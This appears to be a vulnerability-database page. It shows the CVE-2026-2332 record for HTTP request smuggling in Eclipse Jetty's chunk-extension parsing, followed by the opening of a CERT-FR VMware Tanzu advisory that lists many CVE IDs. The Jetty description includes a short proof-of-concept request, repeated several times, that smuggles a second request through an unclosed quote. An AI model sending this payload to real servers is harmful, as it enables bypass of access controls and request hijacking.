Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2026-2332 (GCVE-0-2026-2332)
Vulnerability from cvelistv5 – Published: 2026-04-14 10:59 – Updated: 2026-04-15 03:58- CWE-444 - Inconsistent interpretation of HTTP requests ('HTTP Request/Response smuggling')
| URL | Tags |
|---|---|
| https://github.com/jetty/jetty.project/security/a… | third-party-advisory |
| https://gitlab.eclipse.org/security/cve-assignmen… | issue-tracking |
| Vendor | Product | Version | |
|---|---|---|---|
| Eclipse Foundation | Eclipse Jetty |
Affected:
12.1.0 , ≤ 12.1.6
(semver)
Affected: 12.0.0 , ≤ 12.0.32 (semver) Affected: 11.0.0 , ≤ 11.0.27 (semver) Affected: 10.0.0 , ≤ 10.0.27 (semver) Affected: 9.4.0 , ≤ 9.4.59 (semver) |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-2332",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-04-14T00:00:00+00:00",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-04-15T03:58:12.322Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://repo.maven.apache.org/maven2",
"defaultStatus": "unaffected",
"packageName": "pkg://maven/org.eclipse.jetty/jetty-http",
"product": "Eclipse Jetty",
"repo": "https://github.com/jetty/jetty.project",
"vendor": "Eclipse Foundation",
"versions": [
{
"lessThanOrEqual": "12.1.6",
"status": "affected",
"version": "12.1.0",
"versionType": "semver"
},
{
"lessThanOrEqual": "12.0.32",
"status": "affected",
"version": "12.0.0",
"versionType": "semver"
},
{
"lessThanOrEqual": "11.0.27",
"status": "affected",
"version": "11.0.0",
"versionType": "semver"
},
{
"lessThanOrEqual": "10.0.27",
"status": "affected",
"version": "10.0.0",
"versionType": "semver"
},
{
"lessThanOrEqual": "9.4.59",
"status": "affected",
"version": "9.4.0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "https://github.com/xclow3n"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "In Eclipse Jetty, the HTTP/1.1 parser is vulnerable to request smuggling when chunk extensions are used, similar to the \"funky chunks\" techniques outlined here:\u003cbr\u003e\u003cul\u003e\u003cli\u003e\u003cspan\u003ehttps://w4ke.info/2025/06/18/funky-chunks.html\u003c/span\u003e\u003cbr\u003e\u003c/li\u003e\u003cli\u003e\u003cspan\u003ehttps://w4ke.info/2025/10/29/funky-chunks-2.html\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003eJetty terminates chunk extension parsing at\u0026nbsp;\u003ccode\u003e\\r\\n\u003c/code\u003e\u0026nbsp;inside quoted strings instead of treating this as an error.\u003cbr\u003e\u003cbr\u003e\n\u003cpre\u003ePOST / HTTP/1.1\nHost: localhost\nTransfer-Encoding: chunked\n\n1;ext=\"val\nX\n0\n\nGET /smuggled HTTP/1.1\n...\n\u003c/pre\u003e\n\n\u003cdiv\u003e\u003cbr\u003eNote how the chunk extension does not close the double quotes, and it is able to inject a smuggled request.\u003cbr\u003e\u003c/div\u003e"
}
],
"value": "In Eclipse Jetty, the HTTP/1.1 parser is vulnerable to request smuggling when chunk extensions are used, similar to the \"funky chunks\" techniques outlined here:\n * https://w4ke.info/2025/06/18/funky-chunks.html\n\n * https://w4ke.info/2025/10/29/funky-chunks-2.html\n\n\nJetty terminates chunk extension parsing at\u00a0\\r\\n\u00a0inside quoted strings instead of treating this as an error.\n\n\nPOST / HTTP/1.1\nHost: localhost\nTransfer-Encoding: chunked\n\n1;ext=\"val\nX\n0\n\nGET /smuggled HTTP/1.1\n...\n\n\n\n\n\nNote how the chunk extension does not close the double quotes, and it is able to inject a smuggled request."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-444",
"description": "CWE-444 Inconsistent interpretation of HTTP requests (\u0027HTTP Request/Response smuggling\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-14T10:59:10.193Z",
"orgId": "e51fbebd-6053-4e49-959f-1b94eeb69a2c",
"shortName": "eclipse"
},
"references": [
{
"tags": [
"third-party-advisory"
],
"url": "https://github.com/jetty/jetty.project/security/advisories/GHSA-355h-qmc2-wpwf"
},
{
"tags": [
"issue-tracking"
],
"url": "https://gitlab.eclipse.org/security/cve-assignment/-/issues/89"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "HTTP Request Smuggling via Chunked Extension Quoted-String Parsing",
"x_generator": {
"engine": "Vulnogram 1.0.1"
}
}
},
"cveMetadata": {
"assignerOrgId": "e51fbebd-6053-4e49-959f-1b94eeb69a2c",
"assignerShortName": "eclipse",
"cveId": "CVE-2026-2332",
"datePublished": "2026-04-14T10:59:10.193Z",
"dateReserved": "2026-02-11T09:56:25.879Z",
"dateUpdated": "2026-04-15T03:58:12.322Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-2332",
"date": "2026-06-14",
"epss": "0.00021",
"percentile": "0.06011"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-2332\",\"sourceIdentifier\":\"emo@eclipse.org\",\"published\":\"2026-04-14T12:16:21.333\",\"lastModified\":\"2026-05-01T13:31:00.310\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"In Eclipse Jetty, the HTTP/1.1 parser is vulnerable to request smuggling when chunk extensions are used, similar to the \\\"funky chunks\\\" techniques outlined here:\\n * https://w4ke.info/2025/06/18/funky-chunks.html\\n\\n * https://w4ke.info/2025/10/29/funky-chunks-2.html\\n\\n\\nJetty terminates chunk extension parsing at\u00a0\\\\r\\\\n\u00a0inside quoted strings instead of treating this as an error.\\n\\n\\nPOST / HTTP/1.1\\nHost: localhost\\nTransfer-Encoding: chunked\\n\\n1;ext=\\\"val\\nX\\n0\\n\\nGET /smuggled HTTP/1.1\\n...\\n\\n\\n\\n\\n\\nNote how the chunk extension does not close the double quotes, and it is able to inject a smuggled request.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"emo@eclipse.org\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N\",\"baseScore\":7.4,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.2,\"impactScore\":5.2},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\",\"baseScore\":9.1,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":5.2}]},\"weaknesses\":[{\"source\":\"emo@eclipse.org\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-444\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"9.4.0\",\"versionEndExcluding\":\"9.4.60\",\"matchCriteriaId\":\"E0FB149B-EF33-4A51-9B96-030899E250CC\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"10.0.0\",\"versionEndExcluding\":\"10.0.28\",\"matchCriteriaId\":\"361D419A-7A89-439A-99B1-D34E9914BAE8\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"11.0.0\",\"versionEndExcluding\":\"11.0.28\",\"matchCriteriaId\":\"7020D8E5-61DD-4DB6-82E4-EA46A96838A9\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"12.0.0\",\"versionEndExcluding\":\"12.0.33\",\"matchCriteriaId\":\"E1A6095F-3D1E-40CB-A875-D41BF6C73EB3\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"12.1.0\",\"versionEndExcluding\":\"12.1.7\",\"matchCriteriaId\":\"B5A32954-7B03-46B6-9956-54BE0F8477E8\"}]}]}],\"references\":[{\"url\":\"https://github.com/jetty/jetty.project/security/advisories/GHSA-355h-qmc2-wpwf\",\"source\":\"emo@eclipse.org\",\"tags\":[\"Exploit\",\"Vendor Advisory\",\"Mitigation\"]},{\"url\":\"https://gitlab.eclipse.org/security/cve-assignment/-/issues/89\",\"source\":\"emo@eclipse.org\",\"tags\":[\"Issue Tracking\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-2332\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-04-14T13:06:34.622366Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-04-14T13:08:48.379Z\"}}], \"cna\": {\"title\": \"HTTP Request Smuggling via Chunked Extension Quoted-String Parsing\", \"source\": {\"discovery\": \"UNKNOWN\"}, \"credits\": [{\"lang\": \"en\", \"type\": \"reporter\", \"value\": \"https://github.com/xclow3n\"}], \"metrics\": [{\"format\": \"CVSS\", \"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.4, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}, \"scenarios\": [{\"lang\": \"en\", \"value\": \"GENERAL\"}]}], \"affected\": [{\"repo\": \"https://github.com/jetty/jetty.project\", \"vendor\": \"Eclipse Foundation\", \"product\": \"Eclipse Jetty\", \"versions\": [{\"status\": \"affected\", \"version\": \"12.1.0\", \"versionType\": \"semver\", \"lessThanOrEqual\": \"12.1.6\"}, {\"status\": \"affected\", \"version\": \"12.0.0\", \"versionType\": \"semver\", \"lessThanOrEqual\": \"12.0.32\"}, {\"status\": \"affected\", \"version\": \"11.0.0\", \"versionType\": \"semver\", \"lessThanOrEqual\": \"11.0.27\"}, {\"status\": \"affected\", \"version\": \"10.0.0\", \"versionType\": \"semver\", \"lessThanOrEqual\": \"10.0.27\"}, {\"status\": \"affected\", \"version\": \"9.4.0\", \"versionType\": \"semver\", \"lessThanOrEqual\": \"9.4.59\"}], \"packageName\": \"pkg://maven/org.eclipse.jetty/jetty-http\", \"collectionURL\": \"https://repo.maven.apache.org/maven2\", \"defaultStatus\": \"unaffected\"}], \"references\": [{\"url\": \"https://github.com/jetty/jetty.project/security/advisories/GHSA-355h-qmc2-wpwf\", \"tags\": [\"third-party-advisory\"]}, {\"url\": \"https://gitlab.eclipse.org/security/cve-assignment/-/issues/89\", \"tags\": [\"issue-tracking\"]}], \"x_generator\": {\"engine\": \"Vulnogram 1.0.1\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"In Eclipse Jetty, the HTTP/1.1 parser is vulnerable to request smuggling when chunk extensions are used, similar to the \\\"funky chunks\\\" techniques outlined here:\\n * https://w4ke.info/2025/06/18/funky-chunks.html\\n\\n * https://w4ke.info/2025/10/29/funky-chunks-2.html\\n\\n\\nJetty terminates chunk extension parsing at\\u00a0\\\\r\\\\n\\u00a0inside quoted strings instead of treating this as an error.\\n\\n\\nPOST / HTTP/1.1\\nHost: localhost\\nTransfer-Encoding: chunked\\n\\n1;ext=\\\"val\\nX\\n0\\n\\nGET /smuggled HTTP/1.1\\n...\\n\\n\\n\\n\\n\\nNote how the chunk extension does not close the double quotes, and it is able to inject a smuggled request.\", \"supportingMedia\": [{\"type\": \"text/html\", \"value\": \"In Eclipse Jetty, the HTTP/1.1 parser is vulnerable to request smuggling when chunk extensions are used, similar to the \\\"funky chunks\\\" techniques outlined here:\u003cbr\u003e\u003cul\u003e\u003cli\u003e\u003cspan\u003ehttps://w4ke.info/2025/06/18/funky-chunks.html\u003c/span\u003e\u003cbr\u003e\u003c/li\u003e\u003cli\u003e\u003cspan\u003ehttps://w4ke.info/2025/10/29/funky-chunks-2.html\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003eJetty terminates chunk extension parsing at\u0026nbsp;\u003ccode\u003e\\\\r\\\\n\u003c/code\u003e\u0026nbsp;inside quoted strings instead of treating this as an error.\u003cbr\u003e\u003cbr\u003e\\n\u003cpre\u003ePOST / HTTP/1.1\\nHost: localhost\\nTransfer-Encoding: chunked\\n\\n1;ext=\\\"val\\nX\\n0\\n\\nGET /smuggled HTTP/1.1\\n...\\n\u003c/pre\u003e\\n\\n\u003cdiv\u003e\u003cbr\u003eNote how the chunk extension does not close the double quotes, and it is able to inject a smuggled request.\u003cbr\u003e\u003c/div\u003e\", \"base64\": false}]}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-444\", \"description\": \"CWE-444 Inconsistent interpretation of HTTP requests (\u0027HTTP Request/Response smuggling\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"e51fbebd-6053-4e49-959f-1b94eeb69a2c\", \"shortName\": \"eclipse\", \"dateUpdated\": \"2026-04-14T10:59:10.193Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-2332\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-04-15T03:58:12.322Z\", \"dateReserved\": \"2026-02-11T09:56:25.879Z\", \"assignerOrgId\": \"e51fbebd-6053-4e49-959f-1b94eeb69a2c\", \"datePublished\": \"2026-04-14T10:59:10.193Z\", \"assignerShortName\": \"eclipse\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
CERTFR-2026-AVI-0500
Vulnerability from certfr_avis - Published: 2026-04-27 - Updated: 2026-04-27
De multiples vulnérabilités ont été découvertes dans VMware Tanzu. Elles permettent à un attaquant de provoquer un problème de sécurité non spécifié par l'éditeur.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
| Title | Publication Time | Tags | ||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Tanzu Greenplum Platform Extension Framework versions ant\u00e9rieures \u00e0 8.0.0",
"product": {
"name": "N/A",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu Data Lake versions ant\u00e9rieures \u00e0 4.0.0",
"product": {
"name": "N/A",
"vendor": {
"name": "VMware",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2019-12384",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-12384"
},
{
"name": "CVE-2019-17267",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-17267"
},
{
"name": "CVE-2026-2229",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-2229"
},
{
"name": "CVE-2018-19362",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-19362"
},
{
"name": "CVE-2026-33871",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33871"
},
{
"name": "CVE-2026-22737",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22737"
},
{
"name": "CVE-2026-3449",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-3449"
},
{
"name": "CVE-2023-43642",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-43642"
},
{
"name": "CVE-2021-21409",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-21409"
},
{
"name": "CVE-2026-22036",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22036"
},
{
"name": "CVE-2023-1370",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1370"
},
{
"name": "CVE-2023-33201",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-33201"
},
{
"name": "CVE-2022-46175",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-46175"
},
{
"name": "CVE-2026-24098",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-24098"
},
{
"name": "CVE-2018-14719",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-14719"
},
{
"name": "CVE-2026-24734",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-24734"
},
{
"name": "CVE-2021-0341",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-0341"
},
{
"name": "CVE-2025-66614",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66614"
},
{
"name": "CVE-2020-9546",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-9546"
},
{
"name": "CVE-2025-56200",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-56200"
},
{
"name": "CVE-2020-10673",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-10673"
},
{
"name": "CVE-2020-35728",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35728"
},
{
"name": "CVE-2020-36181",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-36181"
},
{
"name": "CVE-2026-1527",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1527"
},
{
"name": "CVE-2020-9548",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-9548"
},
{
"name": "CVE-2020-36182",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-36182"
},
{
"name": "CVE-2020-24616",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-24616"
},
{
"name": "CVE-2026-41239",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-41239"
},
{
"name": "CVE-2020-36185",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-36185"
},
{
"name": "CVE-2022-37603",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-37603"
},
{
"name": "CVE-2023-34610",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-34610"
},
{
"name": "CVE-2024-47561",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47561"
},
{
"name": "CVE-2019-16942",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-16942"
},
{
"name": "CVE-2022-25883",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-25883"
},
{
"name": "CVE-2026-34486",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34486"
},
{
"name": "CVE-2026-1525",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1525"
},
{
"name": "CVE-2018-1320",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-1320"
},
{
"name": "CVE-2020-9547",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-9547"
},
{
"name": "CVE-2026-29145",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-29145"
},
{
"name": "CVE-2025-24970",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24970"
},
{
"name": "CVE-2025-49128",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-49128"
},
{
"name": "CVE-2020-36179",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-36179"
},
{
"name": "CVE-2018-14718",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-14718"
},
{
"name": "CVE-2020-10650",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-10650"
},
{
"name": "CVE-2025-1647",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1647"
},
{
"name": "CVE-2020-36186",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-36186"
},
{
"name": "CVE-2026-23745",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23745"
},
{
"name": "CVE-2025-7962",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7962"
},
{
"name": "CVE-2020-36189",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-36189"
},
{
"name": "CVE-2019-20444",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-20444"
},
{
"name": "CVE-2020-35490",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35490"
},
{
"name": "CVE-2023-34462",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-34462"
},
{
"name": "CVE-2026-33870",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33870"
},
{
"name": "CVE-2023-34454",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-34454"
},
{
"name": "CVE-2021-20190",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-20190"
},
{
"name": "CVE-2024-29857",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29857"
},
{
"name": "CVE-2020-13949",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-13949"
},
{
"name": "CVE-2023-33202",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-33202"
},
{
"name": "CVE-2024-13009",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-13009"
},
{
"name": "CVE-2023-26115",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-26115"
},
{
"name": "CVE-2025-54550",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-54550"
},
{
"name": "CVE-2025-54920",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-54920"
},
{
"name": "CVE-2024-34447",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34447"
},
{
"name": "CVE-2019-16335",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-16335"
},
{
"name": "CVE-2023-34453",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-34453"
},
{
"name": "CVE-2025-33042",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-33042"
},
{
"name": "CVE-2024-11831",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-11831"
},
{
"name": "CVE-2018-7489",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-7489"
},
{
"name": "CVE-2025-58057",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58057"
},
{
"name": "CVE-2026-34500",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34500"
},
{
"name": "CVE-2025-9624",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9624"
},
{
"name": "CVE-2026-34043",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34043"
},
{
"name": "CVE-2024-26308",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26308"
},
{
"name": "CVE-2025-64718",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-64718"
},
{
"name": "CVE-2020-11113",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-11113"
},
{
"name": "CVE-2025-62718",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-62718"
},
{
"name": "CVE-2026-4800",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-4800"
},
{
"name": "CVE-2026-33671",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33671"
},
{
"name": "CVE-2026-33532",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33532"
},
{
"name": "CVE-2025-68470",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68470"
},
{
"name": "CVE-2025-67721",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-67721"
},
{
"name": "CVE-2024-23454",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-23454"
},
{
"name": "CVE-2020-10672",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-10672"
},
{
"name": "CVE-2022-3510",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3510"
},
{
"name": "CVE-2022-3509",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3509"
},
{
"name": "CVE-2021-37137",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-37137"
},
{
"name": "CVE-2019-14439",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-14439"
},
{
"name": "CVE-2026-33750",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33750"
},
{
"name": "CVE-2025-66236",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66236"
},
{
"name": "CVE-2020-10969",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-10969"
},
{
"name": "CVE-2024-48910",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-48910"
},
{
"name": "CVE-2024-8184",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8184"
},
{
"name": "CVE-2025-11143",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-11143"
},
{
"name": "CVE-2026-34480",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34480"
},
{
"name": "CVE-2025-52999",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-52999"
},
{
"name": "CVE-2025-7783",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7783"
},
{
"name": "CVE-2026-33228",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33228"
},
{
"name": "CVE-2025-12758",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-12758"
},
{
"name": "CVE-2024-21538",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21538"
},
{
"name": "CVE-2020-36187",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-36187"
},
{
"name": "CVE-2026-40175",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-40175"
},
{
"name": "CVE-2024-57083",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57083"
},
{
"name": "CVE-2022-38749",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-38749"
},
{
"name": "CVE-2024-23953",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-23953"
},
{
"name": "CVE-2026-29074",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-29074"
},
{
"name": "CVE-2025-68161",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68161"
},
{
"name": "CVE-2023-34455",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-34455"
},
{
"name": "CVE-2024-29131",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29131"
},
{
"name": "CVE-2026-41240",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-41240"
},
{
"name": "CVE-2026-26960",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26960"
},
{
"name": "CVE-2020-11620",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-11620"
},
{
"name": "CVE-2024-53382",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53382"
},
{
"name": "CVE-2018-12022",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-12022"
},
{
"name": "CVE-2024-47554",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47554"
},
{
"name": "CVE-2022-37601",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-37601"
},
{
"name": "CVE-2018-5968",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-5968"
},
{
"name": "CVE-2025-61795",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61795"
},
{
"name": "CVE-2026-27903",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27903"
},
{
"name": "CVE-2021-21295",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-21295"
},
{
"name": "CVE-2024-45801",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45801"
},
{
"name": "CVE-2020-24750",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-24750"
},
{
"name": "CVE-2025-27821",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27821"
},
{
"name": "CVE-2022-41404",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41404"
},
{
"name": "CVE-2023-39410",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39410"
},
{
"name": "CVE-2024-25710",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-25710"
},
{
"name": "CVE-2024-7254",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7254"
},
{
"name": "CVE-2026-22732",
